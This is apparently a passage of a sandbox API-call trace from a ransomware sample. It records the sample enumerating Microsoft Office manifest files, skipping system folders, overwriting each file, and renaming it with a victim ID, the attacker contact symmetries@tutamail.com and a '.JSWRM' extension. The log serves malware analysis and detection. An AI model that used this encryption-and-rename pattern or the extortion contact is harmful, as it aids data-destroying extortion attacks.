[0072.786] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.786] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0xfde0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0xfde0, lpOverlapped=0x0) returned 1 [0072.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.786] CloseHandle (hObject=0x458) returned 1 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0072.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.788] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP6EFE~1.XML")) returned 1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.788] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.788] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.789] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.789] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.790] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.790] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.790] CloseHandle (hObject=0x458) returned 1 [0072.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0072.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0072.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.791] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf98c485a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cAlternateFileName="APB63F~1.XML")) returned 1 [0072.791] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.791] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.791] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.791] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.792] lstrcmpiW (lpString1="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.793] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.793] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.793] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.794] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.794] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.794] CloseHandle (hObject=0x458) returned 1 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0072.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.796] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cAlternateFileName="APB913~1.XML")) returned 1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.796] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.796] HeapFree 